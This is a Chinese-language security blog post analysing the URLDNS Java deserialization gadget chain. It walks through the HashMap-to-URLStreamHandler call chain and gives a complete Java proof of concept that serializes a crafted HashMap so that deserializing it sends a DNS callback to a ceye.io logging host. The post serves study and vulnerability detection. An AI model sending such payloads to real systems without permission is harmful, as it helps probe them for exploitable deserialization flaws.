<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="前言URLDNS使⽤Java内置的类构造，对第三⽅库没有依赖，只依赖原生类，没有JDK版本限制。它不会执行命令，只会触发DNS解析，因此通常用来探测是否存在反序列化漏洞。 调用链1HashMap#readObject -&gt; HashMap#put -&gt; HashMap#putVal -&gt; HashMap#hash -&gt; URL#hashcode -&gt; URLStrea">
<meta property="og:type" content="article">
<meta property="og:title" content="URLDNS">
<meta property="og:url" content="https://h3rmesk1t.github.io/2023/04/22/URLDNS/index.html">
<meta property="og:site_name" content="H3rmesk1t">
<meta property="og:description" content="前言URLDNS使⽤Java内置的类构造，对第三⽅库没有依赖，只依赖原生类，没有JDK版本限制。它不会执行命令，只会触发DNS解析，因此通常用来探测是否存在反序列化漏洞。 调用链1HashMap#readObject -&gt; HashMap#put -&gt; HashMap#putVal -&gt; HashMap#hash -&gt; URL#hashcode -&gt; URLStrea">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://h3rmesk1t.github.io/2023/04/22/URLDNS/1707275701118-cc0b6db9-4c30-42fe-bb33-731a2a06e776.png">
<meta property="og:image" content="https://h3rmesk1t.github.io/2023/04/22/URLDNS/1707275894132-626d17d4-be94-4e72-9f91-b18a6acc3e44.png">
<meta property="og:image" content="https://h3rmesk1t.github.io/2023/04/22/URLDNS/1707276202385-05f48e38-7214-47e9-aad4-f0dc3a3c7266.png">
<meta property="og:image" content="https://h3rmesk1t.github.io/2023/04/22/URLDNS/1707403094492-287a4020-0cf9-4371-b73e-8bbec590fc22.png">
<meta property="og:image" content="https://h3rmesk1t.github.io/2023/04/22/URLDNS/1707404997100-e657d17e-88a5-4aac-8a58-9073843b08f9.png">
<meta property="og:image" content="https://h3rmesk1t.github.io/2023/04/22/URLDNS/1707405283129-dfe61cd1-dfd0-40ca-9ce7-d49d295115e5.png">
<meta property="og:image" content="https://h3rmesk1t.github.io/2023/04/22/URLDNS/1707405341626-987e9d8a-3fdc-4283-9572-a5f3cfe1af3d.png">
<meta property="article:published_time" content="2023-04-22T06:52:00.000Z">
<meta property="article:modified_time" content="2024-12-19T07:41:29.708Z">
<meta property="article:author" content="H3rmesk1t">
<meta property="article:tag" content="Java">
<meta property="article:tag" content="反序列化">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://h3rmesk1t.github.io/2023/04/22/URLDNS/1707275701118-cc0b6db9-4c30-42fe-bb33-731a2a06e776.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/my-logo-mosaic.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/my-logo-mosaic-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/my-logo-mosaic.png">
        
      
    
    <!-- title -->
    <title>URLDNS</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
      <link rel="alternate" href="/true" title="H3rmesk1t" type="application/atom+xml" />
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/tags/">Tag</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2023/04/23/CommonsCollections/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2023/04/14/ClassLoader/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://h3rmesk1t.github.io/2023/04/22/URLDNS/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://h3rmesk1t.github.io/2023/04/22/URLDNS/&text=URLDNS"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://h3rmesk1t.github.io/2023/04/22/URLDNS/&title=URLDNS"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://h3rmesk1t.github.io/2023/04/22/URLDNS/&is_video=false&description=URLDNS"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=URLDNS&body=Check out this article: https://h3rmesk1t.github.io/2023/04/22/URLDNS/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://h3rmesk1t.github.io/2023/04/22/URLDNS/&title=URLDNS"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://h3rmesk1t.github.io/2023/04/22/URLDNS/&title=URLDNS"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://h3rmesk1t.github.io/2023/04/22/URLDNS/&title=URLDNS"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://h3rmesk1t.github.io/2023/04/22/URLDNS/&title=URLDNS"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://h3rmesk1t.github.io/2023/04/22/URLDNS/&name=URLDNS&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://h3rmesk1t.github.io/2023/04/22/URLDNS/&t=URLDNS"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%B0%83%E7%94%A8%E9%93%BE"><span class="toc-number">2.</span> <span class="toc-text">调用链</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%86%E6%9E%90"><span class="toc-number">3.</span> <span class="toc-text">分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#POC"><span class="toc-number">4.</span> <span class="toc-text">POC</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        URLDNS
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">H3rmesk1t</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2023-04-22T06:52:00.000Z" class="dt-published" itemprop="datePublished">2023-04-22</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/Java/">Java</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/Java/" rel="tag">Java</a>, <a class="p-category" href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="tag">反序列化</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p><font style="color:rgb(0, 0, 0);">URLDNS</font>使⽤Java内置的类构造，对第三⽅库没有依赖<font style="color:rgb(0, 0, 0);">，只依赖原生类，没有</font><font style="color:rgb(0, 0, 0);">JDK</font><font style="color:rgb(0, 0, 0);">版本限制。它不会执行命令，只会触发</font><font style="color:rgb(0, 0, 0);">DNS</font><font style="color:rgb(0, 0, 0);">解析，因此通常用来探测是否存在反序列化漏洞。</font></p>
<h2 id="调用链"><a href="#调用链" class="headerlink" title="调用链"></a>调用链</h2><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">HashMap#readObject -&gt; HashMap#put -&gt; HashMap#putVal -&gt; HashMap#hash -&gt; URL#hashcode -&gt; URLStreamHandler#hashcode -&gt; URLStreamHandler#getHostAddress</span><br></pre></td></tr></table></figure>

<h2 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h2><p>在Java内置的<font style="color:#080808;">java.net.URL</font><font style="color:#080808;background-color:#ffffff;">类中，</font><font style="background-color:#ffffff;">存</font>在的equals方法和hashCode方法都具有一个有趣的特性，在对URL对象进行比较时（使用equals方法或hashCode方法）会触发一次DNS解析<font style="color:rgb(0, 0, 0);">。</font></p>
<p><img src="/2023/04/22/URLDNS/1707275701118-cc0b6db9-4c30-42fe-bb33-731a2a06e776.png"></p>
<p><font style="color:#080808;">java.net.URL#equals</font><font style="color:rgb(0, 0, 0);">方法重写了</font><font style="color:rgb(0, 0, 0);">Object</font><font style="color:rgb(0, 0, 0);">的判断，调用</font><font style="color:#080808;">java.net.</font><font style="color:rgba(0, 0, 0, 0.8);">URLStreamHandler#equals</font><font style="color:rgb(0, 0, 0);">方法进行判断，</font><font style="color:#080808;">java.net.</font><font style="color:rgba(0, 0, 0, 0.8);">URLStreamHandler#equals</font><font style="color:rgb(0, 0, 0);">方法先判断</font><font style="color:rgb(0, 0, 0);">URL</font><font style="color:rgb(0, 0, 0);">对象的锚点（引用）是否相同，并调用</font><font style="color:#080808;">java.net.</font><font style="color:rgba(0, 0, 0, 0.8);">URLStreamHandler#sameFile</font><font style="color:rgb(0, 0, 0);">方法比较传入的两个</font><font style="color:rgb(0, 0, 0);">URL</font><font style="color:rgb(0, 0, 0);">对象</font></p>
<p><img src="/2023/04/22/URLDNS/1707275894132-626d17d4-be94-4e72-9f91-b18a6acc3e44.png"></p>
<p><font style="color:#080808;">java.net.</font><font style="color:rgba(0, 0, 0, 0.8);">URLStreamHandler#sameFile</font><font style="color:rgb(0, 0, 0);">方法中对</font><font style="color:rgb(0, 0, 0);">URL</font><font style="color:rgb(0, 0, 0);">对象的协议、文件名和端口号和主机名进行比较。</font></p>
<p><img src="/2023/04/22/URLDNS/1707276202385-05f48e38-7214-47e9-aad4-f0dc3a3c7266.png"></p>
<p><font style="color:#080808;">java.net.</font><font style="color:rgba(0, 0, 0, 0.8);">URLStreamHandler#sameFile</font><font style="color:rgb(0, 0, 0);">方法</font><font style="color:#080808;">调用</font><font style="color:#080808;">java.net.</font><font style="color:rgba(0, 0, 0, 0.8);">URLStreamHandler#</font><font style="color:rgb(0, 0, 0);">hostsEqual</font><font style="color:rgb(0, 0, 0);">方法进行主机名比较，其中调用</font><font style="color:#080808;">java.net.</font><font style="color:rgba(0, 0, 0, 0.8);">URLStreamHandler#getHostAddress</font><font style="color:rgb(0, 0, 0);">方法对要比较的两个</font><font style="color:rgb(0, 0, 0);">URL</font><font style="color:rgb(0, 0, 0);">进行请求解析</font><font style="color:rgb(0, 0, 0);">IP</font><font style="color:rgb(0, 0, 0);">地址并比较，通过</font><font style="color:rgb(0, 0, 0);">java.net.InetAddress#getByName</font><font style="color:rgb(0, 0, 0);">方法对</font><font style="color:rgb(0, 0, 0);">host</font><font style="color:rgb(0, 0, 0);">进行解析，从而触发</font><font style="color:rgb(0, 0, 0);">DNS</font><font style="color:rgb(0, 0, 0);">请求。</font></p>
<p><img src="/2023/04/22/URLDNS/1707403094492-287a4020-0cf9-4371-b73e-8bbec590fc22.png"></p>
<p><img src="/2023/04/22/URLDNS/1707404997100-e657d17e-88a5-4aac-8a58-9073843b08f9.png"></p>
<p><font style="color:#080808;">java.net.URL#hashcode</font><font style="color:rgb(0, 0, 0);">将一个对象映射为一个整型的值，调用</font><font style="color:#080808;">java.net.</font><font style="color:rgba(0, 0, 0, 0.8);">URLStreamHandler#hashcode</font><font style="color:rgb(0, 0, 0);">方法。</font></p>
<p><img src="/2023/04/22/URLDNS/1707405283129-dfe61cd1-dfd0-40ca-9ce7-d49d295115e5.png"></p>
<p><font style="color:#080808;">java.net.</font><font style="color:rgba(0, 0, 0, 0.8);">URLStreamHandler#hashcode</font><font style="color:rgb(0, 0, 0);">方法通用会调用</font><font style="color:#080808;">java.net.</font><font style="color:rgba(0, 0, 0, 0.8);">URLStreamHandler#getHostAddress</font><font style="color:rgb(0, 0, 0);">方法，从而触发</font><font style="color:rgb(0, 0, 0);">DNS</font><font style="color:rgb(0, 0, 0);">请求。</font></p>
<p><img src="/2023/04/22/URLDNS/1707405341626-987e9d8a-3fdc-4283-9572-a5f3cfe1af3d.png"></p>
<p>接着需要找一个能够触发到<font style="color:#080808;">java.net.URL#equals</font><font style="color:rgb(0, 0, 0);">方法或</font><font style="color:#080808;">java.net.URL#hashcode</font><font style="color:rgb(0, 0, 0);">方法的点，这里利用</font><font style="color:rgb(0, 0, 0);">Java</font><font style="color:rgb(0, 0, 0);">内置的类</font><font style="color:rgb(0, 0, 0);">HashMap</font><font style="color:rgb(0, 0, 0);">或者</font><font style="color:rgb(0, 0, 0);">HashTable</font><font style="color:rgb(0, 0, 0);">都行。</font></p>
<h2 id="POC"><a href="#POC" class="headerlink" title="POC"></a>POC</h2><p>在PoC中，先自定义了URLStreamHandler的子类SilentURLStreamHandler，在初始化URL对象时传入，那么在HashMap#put方法触发的hash计算在调用到URLStreamHandler#getHostAddress方法时，将调用自定义的SilentURLStreamHandler#getHostAddress方法，从而避免在序列化过程中触发DNS查询，而put之后则是利用反射将URL对象的hashCode的值重新改为-1，从而来满足java.net.URL#hashcode方法要求，完成后续触发。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> org.example.deserialize.urldns;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.*;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Field;</span><br><span class="line"><span class="keyword">import</span> java.net.*;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">URLDNSDeserialize</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line"></span><br><span class="line">        <span class="type">SilentURLStreamHandler</span> <span class="variable">silentURLStreamHandler</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">SilentURLStreamHandler</span>();</span><br><span class="line">        HashMap&lt;Object, Object&gt; hashMap = <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;&gt;();</span><br><span class="line">        <span class="type">URL</span> <span class="variable">url</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">URL</span>(<span class="literal">null</span>, <span class="string">&quot;http://fgtee4.ceye.io&quot;</span>, silentURLStreamHandler);</span><br><span class="line">        hashMap.put(url, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">        <span class="type">Field</span> <span class="variable">hashCode</span> <span class="operator">=</span> Class.forName(<span class="string">&quot;java.net.URL&quot;</span>).getDeclaredField(<span class="string">&quot;hashCode&quot;</span>);</span><br><span class="line">        hashCode.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        hashCode.set(url, -<span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="type">ByteArrayOutputStream</span> <span class="variable">byteArrayOutputStream</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ByteArrayOutputStream</span>();</span><br><span class="line">            <span class="type">ObjectOutputStream</span> <span class="variable">outputStream</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(byteArrayOutputStream);</span><br><span class="line">            outputStream.writeObject(hashMap);</span><br><span class="line">            outputStream.flush();</span><br><span class="line">            outputStream.close();</span><br><span class="line"></span><br><span class="line">            <span class="type">ByteArrayInputStream</span> <span class="variable">byteArrayInputStream</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ByteArrayInputStream</span>(byteArrayOutputStream.toByteArray());</span><br><span class="line">            <span class="type">ObjectInputStream</span> <span class="variable">inputStream</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectInputStream</span>(byteArrayInputStream);</span><br><span class="line">            inputStream.readObject();</span><br><span class="line">            inputStream.close();</span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">static</span> <span class="keyword">class</span> <span class="title class_">SilentURLStreamHandler</span> <span class="keyword">extends</span> <span class="title class_">URLStreamHandler</span> &#123;</span><br><span class="line"></span><br><span class="line">        <span class="meta">@Override</span></span><br><span class="line">        <span class="keyword">protected</span> URLConnection <span class="title function_">openConnection</span><span class="params">(URL u)</span> <span class="keyword">throws</span> IOException &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="meta">@Override</span></span><br><span class="line">        <span class="keyword">protected</span> <span class="keyword">synchronized</span> InetAddress <span class="title function_">getHostAddress</span><span class="params">(URL u)</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>


  </div>
</article>


    <div class="blog-post-comments">
        <div id="utterances_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>


        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/tags/">Tag</a></li>
        
          <li><a href="/search/">Search</a></li>
        
          <li><a href="/about/">About</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%B0%83%E7%94%A8%E9%93%BE"><span class="toc-number">2.</span> <span class="toc-text">调用链</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%86%E6%9E%90"><span class="toc-number">3.</span> <span class="toc-text">分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#POC"><span class="toc-number">4.</span> <span class="toc-text">POC</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://h3rmesk1t.github.io/2023/04/22/URLDNS/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://h3rmesk1t.github.io/2023/04/22/URLDNS/&text=URLDNS"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://h3rmesk1t.github.io/2023/04/22/URLDNS/&title=URLDNS"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://h3rmesk1t.github.io/2023/04/22/URLDNS/&is_video=false&description=URLDNS"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=URLDNS&body=Check out this article: https://h3rmesk1t.github.io/2023/04/22/URLDNS/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://h3rmesk1t.github.io/2023/04/22/URLDNS/&title=URLDNS"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://h3rmesk1t.github.io/2023/04/22/URLDNS/&title=URLDNS"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://h3rmesk1t.github.io/2023/04/22/URLDNS/&title=URLDNS"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://h3rmesk1t.github.io/2023/04/22/URLDNS/&title=URLDNS"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://h3rmesk1t.github.io/2023/04/22/URLDNS/&name=URLDNS&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://h3rmesk1t.github.io/2023/04/22/URLDNS/&t=URLDNS"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
      <div class="footer-left">
        Copyright &copy;
        
        
        2023-2025
        H3rmesk1t
      </div>
      <div class="footer-right">
        <nav>
          <ul>
            <!--
          --><li><a href="/">Home</a></li><!--
        --><!--
          --><li><a href="/archives/">Writing</a></li><!--
        --><!--
          --><li><a href="/tags/">Tag</a></li><!--
        --><!--
          --><li><a href="/search/">Search</a></li><!--
        --><!--
          --><li><a href="/about/">About</a></li><!--
        -->
          </ul>
          <ul>
            
              <!-- 不蒜子统计 -->
              <span id="busuanzi_container_site_pv">
                  本站总访问量<span id="busuanzi_value_site_pv"></span>次
              </span>
              <span class="post-meta-divider">|</span>
              <span id="busuanzi_container_site_uv" style='display:none'>
                      本站访客数<span id="busuanzi_value_site_uv"></span>人
              </span>
            <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            
          </ul>
        </nav>
      </div>
      
</footer>


    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

    <script type="text/javascript">
      var utterances_repo = 'H3rmesk1t/h3rmesk1t.github.io';
      var utterances_issue_term = 'pathname';
      var utterances_label = '💬';
      var utterances_theme = 'github-light';

      (function(){
          var script = document.createElement('script');

          script.src = 'https://utteranc.es/client.js';
          script.setAttribute('repo', utterances_repo);
          script.setAttribute('issue-term', 'pathname');
          script.setAttribute('label', utterances_label);
          script.setAttribute('theme', utterances_theme);
          script.setAttribute('crossorigin', 'anonymous');
          script.async = true;
          (document.getElementById('utterances_thread')).appendChild(script);
      }());
  </script>

</body>
</html>
